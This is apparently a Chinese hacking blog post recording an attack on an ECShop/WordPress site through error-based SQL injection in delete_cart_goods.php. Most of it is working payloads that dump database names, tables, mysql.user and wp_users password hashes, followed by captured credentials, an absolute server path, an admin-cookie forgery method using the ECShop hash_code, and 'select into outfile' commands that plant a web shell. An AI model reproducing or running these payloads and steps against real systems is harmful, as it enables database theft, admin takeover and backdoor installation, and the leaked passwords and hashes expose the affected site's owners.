ecshop hash登录 + wordpress mysql盲注字段

delete_cart_goods.php  post  id=a *

   

 sq_xfkjbd


暴库
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

73715F78666B6A6264

爆表
and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,hex(cast(table_name as char)),0x27,0x7e) from information_schema.tables where table_schema=0x73715F78666B6A6264 limit 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

ecs_ad

ecs_ad_user

and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x415256303332 and table_name=0x706870636D735F6D656D626572 limit 0,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1


and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,username,0x27,0x7e) from mysql limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

root  zailai1ping'root
id=a and(select 1 from(select count(*),concat((select (select (select concat(0x7e,password,0x27,user,0x27,0x7e) from mysql.user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

id=a and(select 1 from(select count(*),concat((select (select (select concat(0x7e,password,0x27,user,0x27,0x7e) from sq_xfkjbd.wp_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

wp_users

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user_pass,0x27,0x27,0x7e) from sq_xfkjbd.wp_users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

1/wp-includes/registration-functions.php

2/wp-includes/user.php

3/wp-admin/admin-functions.php

4/wp-admin/upgrade-functions.php

5/wp-content/themes/v7v3_qiyecms7/index.php

 

pwordpress 爆绝对路径C:\wamp\www\cookery\wp-includes\


http://www.xxxx.com/cookery/log.php

ecs_shop_config

   

admin

44c2c3bb5349da02cc24d0dee40d27aa31693422540744c0a6b6da635b7a5a93


root
zailai1ping


353xxxx
$P$BxnaUT.BR/S3inHmDNZyyyJeYpNzHB0


select '' into outfile 'C://wamp//www/cookery//log.php'

   

 ecshop 有一个表ecs_shop_config ,里面有hash_code 貌似2.7.2 和2.7.3都是 31693422540744c0a6b6da635b7a5a93

先记住 管理hash  +hash_code  =c81e629defd086d9ace797987caa76f4 (一起编码转换为32位)

   

最后得到

ECSCP[admin_id]=1; ECSCP[admin_pass]=c81e629defd086d9ace797987caa76f4;ECS[visit_times]=2; ECS_ID=e4ad4c650ef82ef53ff93cd5149098c531ce8dc8; bdshare_firstime=1376041144528

post 提交访问  admin/index.php 进入后台 拿shell的话!

还不懂看  :  http://qqhack8.blog.163.com/blog/static/11414798520137112258776/


select '' into outfile 'C://wamp//www/cookery//loginn.php'

   

posted @ 2016-01-23 17:43  h4ck0ne  阅读(275)  评论(0编辑  收藏  举报